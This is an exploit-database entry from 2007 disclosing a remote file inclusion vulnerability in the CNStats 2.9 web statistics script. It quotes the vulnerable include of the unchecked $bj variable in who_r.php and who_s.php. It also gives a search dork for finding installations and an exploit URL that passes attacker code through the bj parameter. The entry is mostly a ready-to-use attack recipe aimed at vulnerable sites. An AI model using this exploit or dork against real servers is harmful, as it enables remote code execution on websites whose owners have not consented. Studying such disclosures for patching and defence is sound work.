id: 1759
date: 04/14/2007
title: CNStats 2.9 (who_r.php bj) Remote File Inclusion Vulnerability
author: irvian
cves: 

==============================================================
CNStats 2.9 (who_r.php bj) Remote File Inclusion Vulnerability
==============================================================



CNStats 2.9  (who_r.php) Remote File Include Vulnerability

-----------------------------------------------------------------------------------------
# Scripts       : CNStats 2.9
# Discovered By : irvian
# scripts site  : http://www.cnstats.com/
# dork          : "CNStats 2.9"
------------------------------------------------------------------------------------------
bug found:

/reports/who_r.php
/reports/who_s.php

  $bk = 't';
  include $bj . 'reports/who.php';


Exploit: http://www.target.com/reports/who_r.php?bj=[evilcode]



#  0day.today [2023-03-23]  #